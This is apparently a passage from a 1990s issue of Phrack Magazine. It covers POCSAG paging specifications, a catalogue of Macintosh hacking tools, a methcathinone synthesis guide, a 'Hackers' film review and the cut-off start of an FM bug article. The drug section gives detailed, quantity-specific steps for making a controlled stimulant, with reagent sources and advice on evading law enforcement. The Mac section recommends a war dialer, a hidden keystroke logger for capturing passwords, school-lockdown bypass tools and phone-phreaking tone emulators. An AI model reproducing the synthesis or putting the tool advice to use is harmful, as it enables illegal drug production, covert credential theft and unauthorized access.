frame synchronization code marks the start of the batch of codewords.
-PREAMBLE STRUCTURE
The preamble consists of 576 bits of an alternating 101010 pattern transmitted
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
determine if the data received is a POCSAG signal and for synchronization with
the stream of data.
|---Preamble----|-----------First Batch-------------|--Subsec. Batch--|
______________________________________________________< <____________
paging | 576 bits of | | | | | | | | | | | > > |
format | reversals |F| | | | | | | | | | | | | | | | |F| |
| (101010, etc) |S| | | | | | | | | | | | | | | | |S| |
|_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
> >
1 FRAME = 2 CODEWORDS
Preamble Batchs
512 BPS 1125 mS 1062.5 mS
1200 BPS 480 mS 453.3 mS
CodeWords Structure
____________________________________________________________________
BIT | | | | | |
NUMBER | 1 | 2 to 19 | 20,21 | 22 to 31 | 32 |
|___|______________|_______|_______________________|_________________|
____________________________________________________________________
ADDRESS| | | | | |
FORMAT | 0 | Address Bits | S I B | Parity Check Bits | Even parity |
|___|______________|_______|_______________________|_________________|
^
Source identifier bits
____________________________________________________________________
MESSAGE| | | | |
FORMAT | 1 | Message Bits | Parity Check Bits | Even parity |
|___|______________________|_______________________|_________________|
-BATCH STRUCTURE
A batch consist of frame synchronization code follow by 8 frames of two address
codewords per frame (16 address codewords per batch). In order to maintain the
proper batch structure, each frame is filled with two address codewords, or two
idle codewords, or two message codewords, or any appropriate combination of the
three codewords types.
-FRAME SYNCHRONIZATION CODE STRUCTURE
The frame synchronization (FS) code is a unique, reserved word that is used to
identify the beginning of each batch. The FS code comprises the 32 bits:
011111100110100100001010111011000.
-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
An alternate frame synchronization (AFS) code can be selected to support special
systems or systems that require increased coding capability. The AFS is
generated in the same manner as an address codeword (i.e., BCH codeword with
parity bits). The POCSAG signaling standard has reserved special codewords for
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
system to support the AFS. The AFS will change to frame 0 on the programmer
since no frame information is included in the AFS. The AFS should use address
1 so that bit 20 and 21 are 0.
-ADDRESS CODEWORD STRUCTURE
An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
the address bits. The pagers looks at these bits to find its own unique
address. Each POCSAG codeword is capable of providing address information for
four different paging sources (Address 1 to 4). These address are determined
by combinations of values of bits 20 and 21 ( the source-identifier bits). Bits
22 through 31 are the parity check bits, and bit 32 is the even parity bit.
BIT 20 BIT 21
Address 1 0 0
Address 2 0 1
Address 3 1 0
Address 4 1 1
Pre-coded into the code plug are three bits which designate the frame location,
within each batch, at which the pager's address is to be received; the decoder
will look at the codewords in this frame for its address.
Power is removed from the receiver during all frames other than the precoded
one, thus extending pager battery life.
-CODE CAPACITY
The combination of the code plug's three pre-coded frame location bits and address codeword's 18 address bits provides over two million different assignable codes. In this combination, the frame location bits are the least-significant bits, and the addres
s
bits are the most-significant bits.
-MESSAGE CODEWORD STRUCTURE
A message codeword structure always start with a 1 in bit 1 and always follows
directly after the address. Each message codeword replaces an address codeword
in the batch.
-IDLE CODEWORD STRUCTURE
The idle codeword is unique, reserved codeword used to talk place of an address
in any frame that would not otherwise be filled with 64 bits.
Thus, if a frame contains only an address, an idle codeword comprises the 32
bits:
01111010100010011100000110010111
-POCSAG CHARACTERS
CHAR HEX | CHAR HEX | CHAR HEX |
| | |
# 23 | $ 24 | @ 40 |
[ 5B | \ 5C | ] 5D |
^ 5E | _ 5F | ' 60 |
{ 7B | | 7C | } 7D |
~ 7E | DEL 7F | SP 20 |
------------------------------------------------------------------------------
MACINTOSH HACKING
by Logik Bomb
"My fellow astronauts..."
-Dan Quayle
Now, two people have mailed Erik Bloodaxe asking about Macintosh
hacking particularly war dialers, and each time he insulted Macs and tried
to get someone to write a file on it. No one has done it. So I guess I have
to.
First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
originators of the Apple and the Macintosh were busted for phreaking in
college. The Apple IIe was used almost universally by hackers. So why has
the Mac fallen out of favor for hacking? Simple. Because it fell out of
favor for everything else. Apple screwed up and wouldn't let clone makers
license the MacOS. As a result, 80% of personal computers run DOS, and
Macintoshes are left in the minority. Second, DOS compatible users, and
hackers in particular, have an image of Mac users as a bunch of whiny
lamers who paid too much for a computer and as a result are constantly
defensive. The solution to this impression is to not be an asshole. I know
it drives every Mac user crazy when he reads some article about Windows
95's brand new, advanced features such as "plug-and-play" that the
Macintosh has had since 1984. But just try and take it. If it's any
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
hate Windows too.
Now, on with the software.
-------------------------
Assault Dialer 1.5
Assault Dialer, by Crush Commando, is the premier Mac war dialer,
the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
have right now. It is the successor to a previous war dialer known as Holy
War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
now.
MacPGP 2.6.2 and PGPfone 1.0b4
MacPGP is the Macintosh port of the infamous PGP (Pretty Good
Privacy.) This file is not about cryptography, so if you want to know about
PGP read the fuckin' read me and docs that come with the file. Strangely
enough, however, Phil Zimmerman released PGPfone, a utility for encrypting
your phone and making it a secure line, for the Mac _first._ I don't know
why, and I haven't had a chance to test it, but the idea's pretty cool. If
PGP doesn't get Zimmerman thrown in jail, this will.
DisEase 1.0 and DisEase 3.0
Schools and concerned parents have always had a problem. Schools
can't have students deleting the hard drive, and parents don't want their
kids looking at the kinky pictures they downloaded. So Apple came out with
At Ease, an operating system that runs over System 7, sort of the same way
Windows runs off of DOS. However, I can't stand At Ease. Everything about
it, from the Fisher-Price screen to the interface drives me crazy. It
drives a lot of other people crazy too. So it was just a matter of time
before someone made a program to override it. The first was DisEase 1.0, a
small program by someone calling himself Omletman, that would override At
Ease if you put in a floppy loaded with it and clicked six times. Omletman
improved this design and eventually released 3.0. (I haven't been able to
find any evidence that a 2.0 was ever released) 3.0 has such cool features
as reading the preferences file to give you the password, so you can change
the obnoxious greeting teachers always put to something more sinister. The
only problem with 3.0 is that some configurations of At Ease only let
documents be read off of disks; no applications, which means DisEase 3.0
won't appear, and so you can't run it. However, with 1.0 you don't have to
actually open the application, you just click six times, so if you use 1.0
to get to the finder, and then 3.0 to read the passwords, things will work.
Invisible Oasis Installer
Oasis is a keystroke recorder, so you can find out passwords.
However, with the original Oasis, you had to put it in the Extensions
folder and make it invisible with ResEdit, which takes a while. Invisible
Oasis Installer, however, installs it where it should be and automatically
makes it invisible.
"So everything's wrapped up in a nice neat little _package_, then?"
-Homer Simpson
Anonymity 2.0 and Repersonalize 1.0
Anonymity, version 1.2, was a rather old program whose author has
long been forgotten that was the best data fork alterer available. It
removed the personalization to programs. However, in around 1990 someone
named the Doctor made 2.0, a version with some improvements. Repersonalize
was made in 1988 (God, Mac hacking programs are old) which reset
personalization on some of the Microsoft and Claris programs, so you could
enter a different personalization name. I don't know if it will still work
on Microsoft Word 6.0.1 and versions of programs released recently, but I
don't really care because I use Word 5.1a and I'm probably not going to
upgrade for a while.
Phoney (AKA Phoney4Mac)
Phoney is an excellent program that emulates the Blue Box, Red Box,
Black Box and Green Box tones. There is also Phoney4Newton, which does the
same thing on the most portable of computers, the Newton.
That's all I'm covering in this file as far as Mac hacking
programs. You'll probably want to know where to find all this crap, so here
are all of the Mac hacking ftp and Web sites I know of:
Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
It is probably the largest and best archive of Mac hacking software
connected to the Internet. The problem with this is that it can't handle
more than two anonymous users, meaning that unless you pay to be part of
L0pht, you will never get into this archive. I've tried getting up at 4:30
AM, thinking that no one in their right mind would possibly be awake at
this time, but there is always, somehow, somewhere, two people in Iceland
or Singapore or somewhere on this site.
The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
This site does not look like much, and it is fairly obvious that
its maintainer, Sean Warren, is still learning HTML, but it is reliable and
is a good archive. It is still growing, probably due to the fact that it is
one of the only Internet Mac hacking sites anyone can get to and upload.
Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
This is an excellent site and has many good programs. There is one
catch, however. It's maintainer, Ole Buzzard, is actually getting the files
from his BBS. So many of the really good files are locked away in the k0p
BBS, and those of us who can't pay long distance can't get the files. Oh
well.
Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
(http://www.lib.iup.edu/~seaman/index.html)
While this is hardly a Macintosh hacking site, it's just a hacking
site, it does have very few Mac files, some of which are hard to get to.
However, Bone might get expelled because of a long story involving AOHell,
so this page might not be here. Then again, maybe Bone won't get expelled
and this site will stay. Never can tell 'bout the future, can you?
"We predict the future. We invent it."
-Nasty government guy on the season premiere of _The X-Files_
Andy Ryder
Netsurfer and Road Warrior on the Info Highway
I've pestered Bruce Sterling _and_ R.U. Sirius!
As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
Once scored 29,013,920 points on Missile Command
"This Snow Crash thing- is it a virus, a drug, or a religion?"
-Hiro Protagonist
"What's the difference?"
-Juanita Marquez
"...one person's 'cyberpunk' is another's everyday obnoxious teenager with
some technical skill thrown in..."
-Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
"More than _some_ technical skill."
-Andy Ryder
------------------------------------------------------------------------------
Making Methcathinone
Compiled
by Anonymous
Ok, this has got to be the easiest drug made at home (by far). This is very
similar to methamphetamine in structure, effect, and use. Typical doses
start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add
10 mg) or through mucous membranes (nasally).
Ingredients:
Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
Conc. Sulfuric acid - it's up to you where you get this. Contact me if you
need help locating it.
Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
is used for cleaning concrete.
Sodium Hydroxide - Hardware stores. AKA lye.
Toluene - Hardware store, paint store.
Lab equipment:
1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
125 mL separatory funnel - same as above
glass tubing - same as above
Buchner funnel - This is a hard to find item, but must schools have at least
one. They are usually white porcelain or plastic. They look
like a funnel with a flat disk in the bottom with lots of
holes in it. If you need one, arrangements can be made.
Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00
References to Edmund's Scientific Co, in NJ, are accurate. You have to go
to their "Lab Surplus/Mad Scientist" room. The prices are incredible.
This place is definitely a recommended stopping sight for anybody going
through New Jersey. It is located in "Barrington", about 30 minutes from
center city Philadelphia.
All of the above can be purchased from "The Al-Chymist". Their number is
(619)948-4150. Their address is: 17525 Alder #49
Hesperia, Ca 92345
Call and ask for a catalog.
That's it. The body of this article is stolen from the third edition of
"Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried
and proven method by many people. If you want a copy of this book, contact
me.
Good luck and keep away from the DEA
M E T H C A T H I N O N E
K I T C H E N I M P R O V I E S E D C R A N K
The latest designer variant upon the amphetamine molecule to gain
popularity and publicity is methcathinone, commonly called cat. This
substance is remarkably similar to the active ingredient found in the
leaves of the khat tree which the loyal drug warriors on the network news
blame for turning peace loving Somalis into murderous psychopaths. The
active ingredient in the khat leaves is cathinone, which has the same
structural relationship to methcathinone that amphetamine has to
methamphetamine. It is made by oxidizing ephedrine, while meth can be
made by reducing ephedrine.
The high produced by methcathinone is in many ways similar to
methamphetamine. For something so easily made and purified, it is
actually quite enjoyable. the main differences between the meth high and
the methcathinone high are length of action and body fell. With
methcathinone, one can expect to still get to sleep about 8 hours after a
large dose. On the down side, it definitely gives me the impression that
the substance raises the blood pressure quite markedly. This drug may not
be safe for people with weak hearts of blood vessels. Be warned!
Cat is best made using chrome in the +6 oxidation state as the
oxidizer. I recall seeing an article in the narco swine's Journal of
Forensic Science bragging about how they worked out a method for making it
using permanganate, but that method gives an impure product in low yields.
Any of the common hexavalent chrome salts can be used as the oxidizer in
this reaction. This list include chrome trioxide (CrO3), sodium or
potassium chromate (Na2CrO4), and sodium or potassium dichromate
(Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is
used in great quantities in chrome plating. The chromates are used in
tanning and leather making.
To make methcathinone, the chemist starts with the water extract of
ephedrine pills. The concentration of the reactants in this case is not
critically important, so it is most convenient to use the water extract of
the pills directly after filtering without any boiling away of the water.
See the section at the beginning of Chapter 15 [I included this at the end
of the file] on extracting ephedrine form pills. Both ephedrine
hydrochloride and sulfate can be used in this reaction.
The water extract of 1000 ephedrine pills is placed into any
convenient glass container. A large measuring cup is probably best since
it has a pouring lip. Next, 75 grams of any of the above mentioned +6
chrome compounds are added. They dissolve quite easily to form a reddish
or orange colored solution. Finally, concentrated sulfuric acid is added.
If CrO3 is being used, 21 mL is enough for the job. If one of the
chromates is being used, 42 mL is called for. These ingredients are
thoroughly mixed together, and allowed to sit for several hours with
occasional stirring.
After several hours have passed, lye solution is added to the batch
until it is strongly basic. Very strong stirring accompanies this process
to ensure that the cat is converted to the free base. Next, the batch is
poured into a sep funnel, and a couple hundred mLs of toluene is added.
Vigorous shaking, as usual, extracts the cat into the toluene layer. It
should be clear to pale yellow in color. The water layer should be orange
mixed with green. The green may settle out as a heavy sludge. The water
layer is thrown away, and the toluene layer containing the cat is washed
once with water, then poured into a beaker. Dry HCl gas is passed through
the toluene as described in Chapter 5 [I included this at the end of the file]
to get white crystals of cat. The yield is between 15 and 20
grams. This reaction is scaled up quite easily.
CHAPTER 15 (part of it anyway)
P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E
F R O M S T I M U L A N T P I L L S
In the present chemical supply environment, the best routes for making
meth start with ephedrine as the raw material. To use these routes, a
serious hurdle must first be overcome. This hurdle is the fact that the
most easily obtained source of ephedrine, the so-called stimulant or
bronchodilator pills available cheaply by mail order, are a far cry from
the pure starting material a quality minded chemist craves. Luckily,
there is a simple and very low profile method for separating the fillers
in these pills from the desired active ingredient they contain.
A superficial paging through many popular magazines[New Body is where
I found it at GNC] reveals them to be brim full of ads
from mail order outfits offering for sale "stimulant" or "bronchodilator"
pills. These are the raw materials today's clandestine operator requires
to manufacture meth without detection. The crank maker can hide amongst
the huge herd of people who order these pills for the irritating and
nauseating high that can be had by eating them as is. I have heard of a
few cases where search warrants were obtained against people who ordered
very large numbers of these pills, but I would think that orders of up to
a few thousand pills would pass unnoticed. If larger numbers are
required, maybe one's friends could join in the effort.
The first thing one notices when scanning these ads is the large
variety of pills offered for sale. When one's purpose is to convert them
into methamphetamine, it is very easy to eliminate most of the pills
offered for sale. Colored pills are automatically rejected because one
does not want the coloring to be carried into the product. Similarly,
capsules are rejected because individually cutting open capsules is just
too much work. Bulky pills are to be avoided because they contain too much
filler. The correct choice is white cross thins, preferably containing
ephedrine HCl instead of sulfate, because the HCl salt can be used in more
of the reduction routes than can the sulfate.
Once the desired supply of pills is in hand, the first thing which
should be done is to weigh them. This will give the manufacturer an idea
of how much of the pills is filler, and how much is active ingredient.
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
contains 25 grams of active ingredient. A good brand of white cross thins
will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl
may not sound like much, but if it is all recovered from these pills, it
is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three
or four thousand dollars, not a bad return on the twenty odd dollars a
thousand lot of such pills costs. [I don't know where he got 3 or 4
thousand dollars from, but the pills go for about $35.00/1000 now. 2
months ago they were $25.00 but now they have to do more paper work
because it is a DEA controlled substance]
To extract the ephedrine from the pills, the first thing which must be
done is to grind them into a fine powder. This pulverization must be
thorough in order to ensure complete extraction of the ephedrine form the
filler matrix in which it is bound. A blender does a fine job of this
procedure, as will certain brands of home coffee grinders.
Next, the powder from 1000 pills is put into a glass beaker, or other
similar container having a pouring lip, and about 300 mL of distilled
water is added. Gentle heat is then applied to the beaker, as for example
on a stove burner, and with steady stirring the contents of the beaker are
slowly brought up to a gentle boil. It is necessary to stir constantly
because of the fillers will settle to the bottom of the beaker and cause
burning if not steadily stirred.
Once the contents of the beaker have been brought to a boil, it is
removed from the heat and allowed to settle. Then the water is poured out
of the beaker through a piece of filter paper. The filtered water should
be absolutely clear. Next, another 50 mL of water is added to the pill
filler sludge, and it too is heated with stirring. Finally, the pill
sludge is poured into the filter, and the water it contains is allowed to
filter through. It too should be absolutely clear, and should be mixed in
with the first extract. A little water may be poured over the top of the
filler sludge to get the last of the ephedrine out of it. This sludge
should be nearly tasteless, and gritty in texture. The water extract
should taste very bitter, as it contains the ephedrine.
The filtered water is now returned to the stove burner, and half of
the water it contains is gently boiled away. Once this much water has
been boiled off, precautions should be taken to avoid burning the
ephedrine. The best alternative is to evaporate the water off under a
vacuum. If this is not practical with the equipment on hand, the water
may be poured into a glass baking dish. This dish is then put into the
oven with the door cracked open, and the lowest heat applied. In no time
at all, dry crystals of ephedrine HCl can be scraped out of the baking
dish with a razor blade. The serious kitchen experimenter may wish to
further dry them in a microwave.
Chapter 5 (The part about the HCl gas)
A source of anhydrous hydrogen chloride gas is now needed. The
chemist will generate his own. The glassware is set up as in Figure 1.
He will have to bend another piece of glass tubing to the shape shown. It
should start out about 18 inches long. One end of it should be pushed
through a one hole stopper. A 125 mL sep funnel is the best size. The
stoppers and joints must be tight, since pressure must develop inside this
flask to force the hydrogen chloride gas out through the tubing as it is
generated.
Into the 1000 mL, three-necked flask is placed 200 grams of table
salt. Then 25% concentrated hydrochloric acid is added to this flask until
it reaches the level shown in the figure. The hydrochloric acid must be
of laboratory grade [I use regular muriatic acid for pools].
Figure 1:
\ /
??\ /???
?? ?? <--125 mL separatory funnel
? ?
? ?
?? ??
??? ??? glass tubing ??
?? ??
? ? ?????????????????
stopcock->??????? ? ?Salt and Hydrochloric acid
stopper ->????? ??\/?? ????? <-1 hole ?mixed into a paste by add-
????? ? ? ????? stopper ?ing HCL to salt and mixing.
????? ??????? ???????? ? ????? ?The surface should be rough
?? ? ?? ?and a good number of holes
? ? ?should be poked into the
? 1000 mL, 3 neck flask ? ?paste for long lasting
? ? ?generation of HCl gas.
?? ??????acid/salt level?????? ?? ?
??? ??? ?
???? ???? ?
???????? ???????? ?
??????????? ?
Some concentrated sulfuric acid (96-98%) is put into the sep funnel
and the spigot turned so that 1 mL of concentrated sulfuric acid flows
into the flask. It dehydrates the hydrochloric acid and produces hydrogen
chloride gas. This gas is then forced by pressure through the glass
tubing.
One of the Erlenmeyer flasks containing methamphetamine in solvent is
placed so that the glass tubing extends into the methamphetamine, almost
reaching the bottom of the flask. Dripping in more sulfuric acid as
needed keeps the flow of gas going to the methamphetamine. If the flow if
gas is not maintained, the methamphetamine may solidify inside the glass
tubing, plugging it up.
Within a minute of bubbling, white crystals begin to appear in the
solution, More and more of them appear as the process continues. It is an
awe-inspiring sight. In a few minutes, the solution becomes as thick as
watery oatmeal.
It is now time to filter out the crystals, which is a two man job.
The flask with the crystals in it is removed from the HCl source and
temporarily set aside. The three-necked flask is swirled a little to
spread around the sulfuric acid and then the other Erlenmeyer flask is
subjected to a bubbling with HCl. While this flask is being bubbled, the
crystals already in the other flask are filtered out.
The filtering flask and Buchner funnel are set up as shown in figure
2. The drain stem of the buchner funnel extends all the way through the
rubber stopper, because methamphetamine has a nasty tendency to dissolve
rubber stoppers. This would color the product black. A piece of filter
paper covers the flat bottom of the Buchner funnel. The vacuum is turned
on and the hose attached to the vacuum nipple. Then the crystals are
poured into the Buchner funnel. The solvent and uncrystallized
methamphetamine pass through the filter paper and the crystals stay in the
Buchner funnel as a solid cake. About 15 mL of solvent is poured into the
Erlenmeyer flask. the top of the flask is covered with the palm and it is
shaken to suspend the crystals left clinging to the sides. This is also
poured into the Buchner funnel. Finally, another 15 mL of solvent is
poured over the top of the filter cake.
Figure 2:
?????????????
? ? <-B?chner Funnel
?___________?
\ /
\ /
\ /
????????
? ????? <--To vacuum
??? ???
? ?
? ?
??? ???
Filtering ? ?
flask--> ?? ??
? ?
??????????????????
Now the vacuum hose is disconnected and the Buchner funnel, stopper
and all, is pulled from the filtering flask. All of the filtered solvent
is poured back into the erlenmeyer flask it came from. It is returned to
the HCl source for more bubbling. The Buchner funnel is put back into the
top of the filtering flask. It still contains the filter cake of
methamphetamine crystals. It will now be dried out a little bit. The
vacuum is turned back on, the vacuum hose is attached to the filtering
flask, and the top of the Buchner funnel is covered with the palm or
section of latex rubber glove. The vacuum builds and removes most of the
solvent from the filter cake. This takes about 60 seconds. The filter
cake can now be dumped out onto a glass or China plate (not plastic) by
tipping the Buchner funnel upside-down and tapping it gently on the plate.
And so, the filtering process continues, one flask being filtered
while the other one is being bubbled with HCl. Solvent is added to the
Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each
flask has been bubbled for about seven times, no more crystal will come
out and the underground chemist is finished.
If ether was used as the solvent, the filter cakes on the plates will
be nearly dry now. With a knife from the silverware drawer, the cakes are
cut into eighths. They are allowed to dry out some more then chopped up
into powder. If benzene was used, this process takes longer. Heat lamps
may be used to speed up this drying, but no stronger heat source.
[The above section of chapter 5 is talking about methamphetamine. You
could, in most instances, substitute the word methcathinone, but I wanted
to present the text to you in its exact form.]
------------------------------------------------------------------------------
Review of "HACKERS"
By Wile Coyote
Sorry, it might be a little long... cut it to ribbons if you want, most
of it is just a rant anyway... Hope you enjoy it.
First off, I have to admit that I was biased going into the movie
"Hackers"... I heard that it wasn't going to be up to snuff, but did I
let that stop me? No, of course not... I sucked up enough courage to
stride towards my girlfriend and beg for seven bucks... :) She ended up
wanting to see the movie herself (and sadly, she rather enjoyed it...
oh, well, what can you do with the computer illiterate or is it the
computer illegitimate?). Now onto....
THE MOVIE
(Yes, I AM going to give you a second-by-second playback of the
movie... you don't want me to spoil the plot, you say? Well, don't
worry, there is no plot to spoil! :) just kidding, go see it... maybe
you'll like it...)
Well, from the very first few seconds, I was unimpressed... It begins
with an FBI raid on some unsuspecting loose (who turns out to be the
main character, but that's later) named Zero Cool (can you say "EL1EEEEET
WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey,
cinematography counts!) But, the acting was worse. The Feds bust into
this home and run up the stairs, all while this lady (the mom) just kind
of looks on dumbfounded and keeps saying stuff like "hey, stop that...",
or something (is this what a raid is like? I've never had the pleasure...)
Ok, so the story goes on like this: The 11 year old kid made a computer
virus that he uploads to, I think, the NY stock exchange, and it crashes
1,507 computers. There is a really lame court scene where the kid is
sentenced to 7 years probation where he can't use a computer or a
touch-tone phone... That was 1988...
Time passes... Now it's 1995, and boy have things changed (except the
mom... hmmm....). Now the ex-hacker is allowed to use a computer (his
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?)
boxing some TV station to change the program on television (yes, I know
that all of you super-el33t hackers hack into TV stations when you don't
like what's on Ricki Lake!). N-e-way, while hacking into their
super-funky system (the screen just kind of has numbers moving up and
down the screen like some kind of hex-editor on acid...)
he gets into a "hacking battle" with some other hacker called Acid Burn
(I don't think I have ever seen such a trippy view of the "Internet"...
lots of Very high-end graphics, not very realistic, but it's Hollywood...).
In the end, the other hacker kicks the shit out of him (he has changed
his handle to Crash Override now, just to be cool, i guess) and logs him
off the TV station. Wow, tense... cough...
For those of you who care, let me describe the "hacker" Crash Override:
He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky)
clothes, and the CDC might have quite a bit to say about the amount of
leather he wears... I mean, there are limits to that kind of stuff, man!
And to top off his coolness, he is, like, the roller-blade king of the
world. (Not that hackers don't roller-blade, but he does it just Soooo
much cooler than I could... :) ). And yet, here's the nifty part,
despite all of his deft coolness, he couldn't get a girl for the life
of him (we all morn for him in silent prayer).
Ok, so now Crash is at school, and he meets Wonderchick (who is
EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to
spoil the suspense).
Now, while at school, he wants to hook up with wonderchick, so he breaks
into the school's computer (it must be a fucking Cray to support all of
the high-end-type graphics that this dude is pulling up) and gets his
English(?) class changed to hers. So, some other super-d00dcool hacker
spots him playing around with the schools computer (it's funny how may
elite hackers one can meet in a new york public school...), so he
catches up with Crash and invites you to an elite (Oh, if you ever want
to see a movie where the word 3l333333333t is used, like a fucking
million times, then go see Hackers...) hackerz-only club, complete with
million-dollar virtual-reality crap and even a token phreaker trying to
red-box a pay-phone with a cassette recorder (never mind that the music is
about 197 decibels, the phone can still pick up the box tones...).
What follows is that Crash meets up with some seriously k-rad hackers
(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and
Phantom Phreak : who reminds of that gay kid on "my so called life...
maybe that was him?";Lord Nikon : the token black hacker... Photographic
memory is his super-power). They talk about k00l pseudo-hacker shit and
then a l00ser warez-type guy comes up and tries to be El33t like everybody
else. He is just about the ONLY realistic character in the whole movie.
He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps
saying "I need a handle, then I'll be el33t!". (Why he can't just pick
his own handle, like The Avenging Turd or something, is beyond me... He
plays lamer better than the kids in Might Morphin Power Rangers... awesome
actor!). N-e-way, this is where the major discrepancies start. Ok,
first they try to "test" Lamerboy by asking him what the four most used
passwords are. According to the movie, they are "love, sex, god, and
secret". (Hmmmm.... I thought Unix required a 6-8 char. password....).
Somehow lamerboy got into a bank and screwed with an ATM machine four
states away; all of the hacker chastise him for being stupid and hacking
at home (If you watch the movie, you'll notice that the hackers use just
about every pay-phone in the city to do their hacking, no, THAT doesn't
look suspicious)Next they talk about "hacking a Gibson".
(I was informed that they WANTED to use "hacking a Cray",
but the Cray people decided that they didn't want THAT kind of publicity.
I've never heard of a Gibson in real life, though...).
They talk about how k-powerful the security is on a Gibson, and they say
that if Lamerboy can crack one, then he gets to be elite.
Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy
finally cracks a Gibson with the password God (never mind a Login name or
anything that cool). Then the cheese begins in full force. The Gibson
is like a total virtual-reality thingy. Complete with all sorts of cool
looking towers and neon lightning bolts and stuff. Lamerboy hacks into a
garbage file (did I mention that the entire world is populated by Macs?
Oh, I didn't... well, hold on :)...). So, this sets alarms off all
over the place (cause a top-secret file is hidden in the garbage, see?),
and the main bad-guy, security chief Weasel, heads out to catch him. He
plays around with some neon, star-trek-console, buttons for a while,
then calls the "feds" to put a trace on the kid. La de da, ess catches him
in a second, and the kid only gets half of the file, which he hides.
(to spoil the suspense, yet again, the file is some kind of money getting
program, like the kind some LOD members wrote about a long time ago in
Phrack, which pulls money from each transaction and puts it into
a different account. Needless to say, the Security Weasel is the guy who
wrote it, which is why he needs it back, pronto!).
As we travel along the movie, the hackers keep getting busted for tapping
into the Gibson, and they keep getting away. The "action" heats up when
Wonderchick and Crash get into a tiff and they decide to have a hacking
contest... They go all over the city trying their best to fuck with
the one fed they don't like.... Brilliant move, eh? The movie kind of
reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
They all fondle over the machine with the same intensity that Captain Kirk
gave to fighting Klingons, and frankly, their acting abilities seems
to ask "please deposit thirty-five cents for the next three minutes".
It was funny listening to the actors, 'cause they didn't know shit about
what they were saying... Here's a clip:
Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not
Kbps, mind you :)...I wonder where they designed a .8 of a bit?)
Yeah! Cool... Hey what kind of chip does it have in it?
A P6! Three times faster than a Pentium.... Yep, RISC is the wave of
the future... (I laughed so hard..... Ok, first of all, it is a Mac.
Trust me, it has the little apple on the cover. Second it has a P6, what
server she ripped this out of, I dare not ask. How she got that
bastard into a laptop without causing the casing to begin melting is
yet another problem... those get very hot, i just read about them
in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6,
because it has RISC coding....
I kinda wished I had stayed for the credits to see the line:
Technical advisor None.... died on route to work...)
Finally they ask something about the screen, and they find out it is
an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!
They do lots of nifty things with their magic laptops (I noticed that they
ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say
you can't hack on a mac, 'cause really you can hack on a TI-81 if you've
got the know.... but please, not EVERYONE in the fucking movie
has to have the exact same computer (different colors, though... there
was a really cool clear one).... it got really sad at the end), and they
finally find out what the garbage file that Lamerboy stole was, this time
using a hex editor/CAD program of some sort.
As we reach the end of the movie, the hackers enlist the help of two very
strangely painted phone phreaks who give the advice to the hackers to send
a message to all of the hackers on the 'net, and together, they all
kicked some serious ass with the super-nifty-virtual-reality Gibson.
In the end, all of the Hackers get caught except for one, who pirates all
of the TV station in the world and gives the police the "real" story...
So, the police politely let them go, no need for actually proving that the
evidence was real or anything, of course.
So, in the end, I had to say that the movie was very lacking. It seemed
to be more of a Hollywood-type flashy movie, than an actual documentary
about hackers. Yes, I know an ACTUAL movie about hacker would suck, but
PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It
may have sucked less if they didn't put flashing, 64 million color,
fully-rendered, magically delicious pictures floating all over the screen
instead of just a simple "# " prompt at the bottom. With all of the
super-easy access to all of the worlds computers, as depicted in the movie,
ANYBODY can be a hacker, regardless of knowledge, commitment, or just
plain common sense. And that's what really made it suck...
Hope you enjoyed my review of HACKERS!
==Phrack Magazine==
Volume Seven, Issue Forty-Eight, File 4 of 18
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
PART II
------------------------------------------------------------------------------
+===================================+
| CONSTRUCTING AN FM BUG |
| -------------------- |
| |
| written by |
| + Obi-1 |
| * edjjs@cc.newcastle.edu.au|
| * * |
| |
| $ Written for Phrack |
| x$x if any other magazine |
| $ wishes to print this |
| x$x article they must let the |
| author know in advance |
+===================================+
INTRODUCTION
Before anything this article sole purpose is to teach everyone
